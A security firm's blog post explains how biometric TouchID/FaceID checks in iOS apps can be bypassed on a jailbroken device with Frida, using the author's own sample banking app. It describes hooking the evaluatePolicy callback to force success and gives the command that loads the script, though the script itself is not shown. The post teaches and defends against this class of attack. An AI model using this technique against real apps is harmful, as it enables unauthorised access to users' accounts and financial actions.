Bypassing your apps’ biometric checks on iOS

Red Phone

 

Using iOS biometrics features like TouchID and FaceID is a really convenient way to authenticate a user before performing sensitive actions. These actions, of course, depend on apps’ features. Usually, we test apps that use TouchID/FaceID to log in and to confirm financial actions (e.g. wire transfer). But, do these checks can be treated as 100% secure?

 

The answer is of course not. Biometrics checks are performed on your device, and like any others ‘client-side checks’ can be bypassed if an attacker can control the application/device. In this blog post, I want to show you how easy that hack may be done.

 

To perform the attack, we need:

 

  • jailbroken device (if you do not have one, check this presentation),
  • Frida,
  • text editor. 😉

 

Sample app – SecuBank

 
I prepared a really simple application that asks you for your finger/face and displays a message if the verification was successful or not.

 

 
Note that the application’s logic was implemented in Swift:

 

Frida script

 
Now, we have to write a Frida script that bypasses the check. As you can see in the above-pasted code snippet, the evaluatePolicy uses a callback that determines the result. So, the easiest way to achieve the hack is to intercept that callback and make sure it always returns the success=1.
 

Hacking the SecuBank app

 
At this moment, we just need to open the SecuBank and load the script with Frida:

 

$frida -U -l bypass.js -f biz.securing.SecuBank –no-pause

 

 

Summary

 

In this article, I showed you again that any kind of local checks can be bypassed, including the biometrics ones provided by the iOS/macOS. These checks are really convenient, but you have to always remember that they cannot guarantee any reliability if the device is jailbroken.

 

If you are interested in implementing such jailbreak checks, take a look at the iOS Security Suite — our open source project!

 

Stay tuned!

  • Articles and free security guides
  • Reports
  • Presentations and news from conferences around the world
Providing personal data is voluntary. We will send the newsletter until the consent is withdrawn (You can withdraw your consent at any time). Your data will be processed for a period specified in the Privacy Policy available at the following URL.
The Data Controller is SecuRing SJ with the registered office at ul. Kalwaryjska 65/6, 30-504 Kraków. I have the right to withdraw my consent at any time (by sending an e-mail to the address info@SecuRing.pl or by phone: +48 (12) 425 25 75). I have the right to access, rectify, erase or limit the processing of my personal data, the right to object, the right to file a complaint with the supervisory authority and right to transfer data. The legal basis for the processing of personal data is Article 6 (1) (a) of the General Data Protection Regulation (GDPR).
The Data Controller uses various IT solutions that allow for more efficient communication and cooperates with entities supporting it in its business and IT processes (i.e. these companies are data recipients/processors). Data are not transferred outside the European Economic Area. These companies have signed appropriate contracts for entrustment of personal data processing.
Thank you for subscribing.
Something went wrong.
Please contact us by phone.